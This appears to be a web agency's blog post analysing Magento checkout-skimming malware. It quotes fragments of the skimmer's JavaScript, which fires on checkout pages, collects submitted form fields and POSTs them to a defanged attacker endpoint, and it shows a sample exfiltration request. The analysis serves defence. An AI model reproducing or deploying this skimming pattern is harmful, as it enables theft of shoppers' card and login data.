Kleinburg Brewery
- design
- / web
For months now, there’s been a gradual increase in malware campaigns stealing pertinent personal and financial information. Hackers generally use malicious code during the shopping cart process that gives them the opportunity to leak credit card numbers, addresses, PIN numbers, and so forth.
The main goal? Identity theft and fraud.
In particular, images can be used by hackers to store malicious information and bypass other security measures. Let’s take a closer look at another way that Magento malware is being used to steal sensitive information.
A deeper scan is necessary to locate the issue. After a server side environment is scanned, malicious code can be located into the Magento database table core_config_data. This is a well-known table because it is able to store configuration values and is heavily abused by hackers and credit card thieves.
Within the database table, the scripts will warn researchers to investigate this code:
if((new RegExp('onepage|checkout|onestep','gi')).test(window.location)){
l0f6968e8733d6beab37ec66b16790bc4.send();
}
This code will call the function send() of alphanumeric code:
l0f6968e8733d6beab37ec66b16790bc4
… which will run each time the visitor’s present page URL has any one of the following words:
- checkout
- onepage
- onestep
These often match with the page URL’s of Magento when logging in and checking out.
So what is this object variable doing?
By looking at this code, two parameters can be seen:
var l0f6968e8733d6beab37ec66b16790bc4={
snd:null,
y66474badc9cc3127dbf59faa45aa6303:'hXXps:\/\/web-stat[.]biz\/mainstat_logo[.]jpg',
myid:(function(name){
[...]
return myid;
})(),
These parameters are doing the following:snd: null
Setting to null at the start, which will inevitably have leaked data in URL notation.
y66474badc9cc3127dbf59faa45aa6303:’hXXps:\/\/web-stat[.]biz\/mainstat_logo[.]jpg’
A variable where the malicious website is declared, which is the destination of the leaked data.
The code first takes inventory of all elements that are present on the page that can identify a specific “button” and ignores all other form inputs elements. Then it captures the click event by attaching an eventListener on these buttons. After the page scan has been completed, it looks for all form elements on the page and then attaches that eventListener on the “submit” event.
Basically, the code is keeping tabs on the page and capturing pertinent information by driving events when certain buttons are pressed. After the user is observed using the submit button, the code can now catch all the information that was entered.
Once the listener is triggered, the form has been filled. The attacker then collects the info from the fields by adding the field names and associated values in URL notation to the snd parameter.
The last step for the send() function is to send all the leaked data. Other details are included with this data to assist the hacker in determining where this is occurring. To do this, an ID is generated using the date, time, and the victim’s website domain.
When all is said and done, the script will create a POST request to the malicious endpoint, which looks a little like the following:
Host: hXXps:\/\/web-stat[.]biz\/mainstat_logo[.]jpg
Header: Content-Type: application/x-www-form-urlencoded
Params: info=bG9naW49Z3V5JnBhc3M9Z3V5&hostname=domain.ext&key=1484001139233-486788823
The data parameter features the leaked information from a checkout or login page as well as the hostname.
The majority of stolen credit card and login information is typically used within the first 24 hours.
Protecting Sensitive Data Associated With Your eCommerce Store
As the owner and operator of a digital e-commerce store, it’s your responsibility to manage your customers’ sensitive information, including credit card numbers, billing addresses, login credentials, PIN numbers, and so on. People who use your site are depending on you to keep their information safe. As soon as you lose the trust of your customers, your business will not only suffer, but you could also face litigation.
As such, it’s critical to ensure you have a strong security suite that protects your online store environment.